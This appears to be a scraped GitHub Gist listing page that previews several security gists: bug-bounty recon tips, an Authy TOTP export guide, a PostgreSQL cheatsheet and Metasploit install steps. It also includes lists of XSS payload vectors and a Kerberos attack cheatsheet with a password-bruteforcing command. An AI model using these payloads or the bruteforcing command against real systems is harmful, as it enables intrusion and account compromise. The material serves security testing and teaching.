Skip to content

Instantly share code, notes, and snippets.

View six2dez's full-sized avatar
🐧
Hack 'em all

six2dez six2dez

🐧
Hack 'em all
2.5k followers · 216 following
View GitHub Profile
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active June 2, 2026 13:09
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@gboudreau
gboudreau / AuthyToOtherAuthenticator.md
Last active June 2, 2026 02:25 — forked from Ingramz/AuthyToOtherAuthenticator.md
Export TOTP tokens from Authy

Exporting your 2FA tokens from Authy to transfer them into another 2FA application

IMPORTANT - Update regarding deprecation of Authy desktop apps

Past August 2024, Authy stopped supported the desktop version of their apps:
See Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August for details.

And indeed, after a while, Authy changed something in their backend which now prevents the old desktop app from logging in. If you are already logged in, then you are in luck, and you can follow the instructions below to export your tokens.

If you are not logged in anymore, but can find a backup of the necessary files, then restore those files, and re-install Authy 2.2.3 following the instructions below, and it should work as expected.

@jhaddix
jhaddix / all.txt
Last active June 1, 2026 00:13
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@Kartones
Kartones / postgres-cheatsheet.md
Last active May 31, 2026 00:33
PostgreSQL command line cheatsheet

PSQL

Magic words:

psql -U postgres

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlaying queries of the \ commands (cool for learning!)
  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't has a default database, like at AWS RDS)
@tomnomnom
tomnomnom / alert.js
Last active May 29, 2026 21:28
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@kurobeats
kurobeats / xss_vectors.txt
Last active May 26, 2026 09:33
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@devnoname120
devnoname120 / My macOS setup.md
Last active May 24, 2026 20:08
My macOS setup

ℹ️ Enable iCloud end-to-end encryption:

  • Nobody knows that, but iCloud actually supports end-to-end encryption (see “Advanced Data Protection for iCloud”) but it’s disabled by default. If you care about data privacy, you should turn it on.
    • System settingsApple IDiCloud → Set Advanced Data Protection to On.
    • System settingsApple IDiCloud → Disable Access iCloud Data on the Web.
  • It supports almost all the native Apple apps, with the notable exceptions of iCloud Mail, Contacts, and Calendars. See official data protection matrix for more info.

Table of Contents

@z0rs
z0rs / Red-Teaming-tool.md
Last active May 24, 2026 03:21
@tyrell
tyrell / metasploit-on-m1-macbook-air.md
Last active May 22, 2026 17:03
Installing Metasploit on an M1 Macbook Air

Introduction

This method installs Metasploit from the official OSX installer found at https://osx.metasploit.com/metasploitframework-latest.pkg

Run the installer

  1. Download the installer from https://osx.metasploit.com/metasploitframework-latest.pkg
  2. Run the installer.
  3. You should get it blocked from running.
  4. Go to OSX System Preferences -> Security & Privacy and tell OSX to "Open it anyway".
  5. The installer will start.
  6. At some point you will have to type your password to give the installer elevated privileges to continue.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: